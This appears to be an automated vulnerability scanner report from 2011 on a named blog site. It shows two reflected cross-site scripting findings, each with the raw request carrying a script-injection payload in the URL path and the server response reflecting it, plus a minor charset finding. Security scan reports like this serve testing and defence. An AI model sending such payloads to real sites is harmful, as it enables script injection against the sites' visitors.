1. Cross-site scripting (reflected)
1.1. http://www.outofhanwell.com/blog/index.php [REST URL parameter 1]
1.2. http://www.outofhanwell.com/blog/index.php [REST URL parameter 2]
2. HTML does not specify charset
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.outofhanwell | 
| Path: | /blog/index.php | 
| GET /1b1d4"><script>alert(1)< Host: www.outofhanwell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close | 
| HTTP/1.1 404 Not Found Date: Wed, 05 Jan 2011 17:05:42 GMT Server: Apache Content-Length: 2340 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR <html> <head> <title>Error 404 - Not found</title> </head> <frameset rows="100%" framebo ...[SNIP]... <frame src="http://www ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.outofhanwell | 
| Path: | /blog/index.php | 
| GET /blog/8d5d9"><script>alert(1)< Host: www.outofhanwell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close | 
| HTTP/1.1 404 Not Found Date: Wed, 05 Jan 2011 17:05:44 GMT Server: Apache Content-Length: 2334 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR <html> <head> <title>Error 404 - Not found</title> </head> <frameset rows="100%" framebo ...[SNIP]... <frame src="http://www ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.outofhanwell | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: www.outofhanwell.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 404 Not Found Date: Wed, 05 Jan 2011 17:20:31 GMT Server: Apache Content-Length: 2298 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR <html> <head> <title>Error 404 - Not found</title> </head> <frameset rows="100%" framebo ...[SNIP]... |